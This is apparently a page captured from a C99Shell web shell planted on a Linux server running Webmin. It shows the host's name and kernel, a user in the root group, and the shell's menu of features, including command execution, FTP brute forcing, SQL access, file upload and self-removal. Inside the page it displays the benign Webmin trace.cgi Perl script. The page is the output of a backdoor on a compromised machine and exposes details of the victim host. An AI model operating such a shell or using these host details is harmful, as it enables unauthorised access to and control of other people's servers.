!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/share/webmin/proc/   drwxr-xr-x
Free 28.67 GB of 117.98 GB (24.3%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     trace.cgi (1.64 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# Display syscalls made by this process in real time

require './proc-lib.pl';
&ReadParse();
&ui_print_unbuffered_header(undef, $text{'trace_title'}, "", "trace");

%pinfo = &process_info($in{'pid'});
&can_edit_process($pinfo{'user'}) || &error($text{'edit_ecannot'});
if (!%pinfo) {
    print "<b>$text{'edit_gone'}</b> <p>\n";
    &ui_print_footer("", $text{'index_return'});
    exit;
    }

$syscalls = &ui_form_start("trace.cgi", "post")."\n".
        &ui_hidden("pid", $in{'pid'})."\n".
        "<b>$text{'trace_syscalls'}</b>\n".
        &ui_radio("all", defined($in{'all'}) ? $in{'all'} : 1,
              [ [ 1, $text{'trace_all'} ],
            [ 0, $text{'trace_sel'} ] ])."\n".
        &ui_textbox("syscalls", $in{'syscalls'}, 40)."\n".
        &ui_submit($text{'trace_change'})."\n".
        &ui_form_end()."\n";

@syscalls = $in{'all'} ? ( ) : split(/\s+/, $in{'syscalls'});
$trace = &open_process_trace($in{'pid'},
                 \@syscalls);
$fmt = "%-8.8s %-11.11s %-80.80s %-10.10s";
print "<b>",&text('trace_start', "<tt>$pinfo{'args'}</tt>"),"</b><br>\n";
print $syscalls;
print "<pre>";
printf "$fmt\n", "Time", "System Call", "Parameters", "Return";
printf "$fmt\n", ("-"x8), ("-"x11), ("-"x80), ("-"x10);
while($action = &read_process_trace($trace)) {
    local $tm = strftime("%H:%M:%S", localtime($action->{'time'}));
    printf "$fmt\n", $tm, $action->{'call'},
             join(", ", @{$action->{'args'}}),
             $action->{'rv'};
    }
print "</pre>";
&close_process_trace($trace);
if (!kill(0, $in{'pid'})) {
    print "<b>$text{'trace_done'}</b><br>\n";
    }
else {
    print "<b>$text{'trace_failed'}</b><br>\n";
    }

&ui_print_footer("edit_proc.cgi?$in{'pid'}", $text{'edit_return'},
         "", $text{'index_return'});


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0034 ]--